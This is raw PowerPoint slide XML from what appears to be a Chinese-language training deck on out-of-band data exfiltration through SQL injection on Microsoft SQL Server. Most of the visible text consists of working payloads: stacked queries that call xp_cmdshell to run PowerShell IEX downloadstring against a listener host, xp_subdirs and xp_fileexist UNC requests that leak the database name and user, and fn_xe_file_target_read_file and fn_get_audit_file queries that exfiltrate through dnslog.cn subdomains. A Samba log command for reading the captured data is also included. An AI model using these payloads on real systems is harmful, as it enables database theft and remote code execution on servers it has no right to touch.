                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(''http://192.168.172.1:8888?data='%2b @a %2b''')"')—</a:t>
            </a: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 id=1';DECLARE @a varchar(8000);SET @a=(select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>);exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> IEX (new-object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>net.webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>downloadstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(''http://192.168.172.1:8888?data='%2b @a %2b''')"')--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{066029AF-57F9-44B3-9289-35B7290F92B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4752419" y="2812165"/>
            <a:ext cx="6444741" cy="616835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26942809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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709776" y="1885315"/>
            <a:ext cx="11482225" cy="485010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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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存在堆叠注入数据外带</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利用</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rPr>
              <a:t>xp_subdirs</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 </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rPr>
              <a:t>xp_dirtree,xp_fileexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>unc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>路径判断文件发起请求带出数据</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注入过程：</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id=1';declare @a varchar(1024);set @a=db_name();exec('master..xp_subdirs "//'%2B'192.168.172.130\\'%2b@a%2b'.txt"')—</a:t>
            </a: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 id=1';declare @a varchar(1024);set @a=(select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>);exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_subdirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> "//'%2B'192.168.172.130\\'%2b@a%2b'.txt"')—</a:t>
            </a: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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>执行命令查看记录     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>tail -f /var/log/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>log.smbd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> | grep "failed"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4544594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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709776" y="1885315"/>
            <a:ext cx="11482225" cy="485010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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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存在堆叠注入数据外带</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利用</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rPr>
              <a:t>xp_subdirs</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 </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rPr>
              <a:t>xp_dirtree,xp_fileexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>unc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>路径判断文件发起请求带出数据</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注入过程：</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id=1';declare @a varchar(1024);set @a=(select user);exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_subdirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> "//'%2B'192.168.172.130\\'%2b@a%2b'.txt"')—</a:t>
            </a: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 id=1';declare @a varchar(1024);set @a=(select user);exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_fileexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> "//'%2B'192.168.172.130\\'%2b@a%2b'.txt"')—</a:t>
            </a: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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>执行命令查看记录     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>tail -f /var/log/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>log.smbd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> | grep "failed"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3723DF-7603-444E-884B-A0F9C205B025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="48341"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8632329" y="1289923"/>
            <a:ext cx="2888867" cy="2560749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1591708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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709776" y="1885315"/>
            <a:ext cx="11482225" cy="4357662"/>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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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不存在堆叠注入数据外带</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利用</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rPr>
              <a:t>fn_xe_file_target_read_file</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 </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rPr>
              <a:t>fn_get_audit_file</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 </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rPr>
              <a:t>fn_trace_gettable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>unc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>路径判断文件发起请求带出数据</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注入过程：</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id=1' and exists(select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>fn_xe_file_target_read_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>('C:*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>','\\'+(select user)+'.7wb9ur.dnslog.cn\1.txt',null,null))--</a:t>
            </a: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 id=1' and exists(select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>fn_get_audit_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>('\\'%2b(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>())%2b'.gge9i3.dnslog.cn\123.txt',default,default))--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4274486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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709776" y="1885315"/>
            <a:ext cx="11482225" cy="33727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a:lnSpc>
                <a:spcPct val="150000"/>
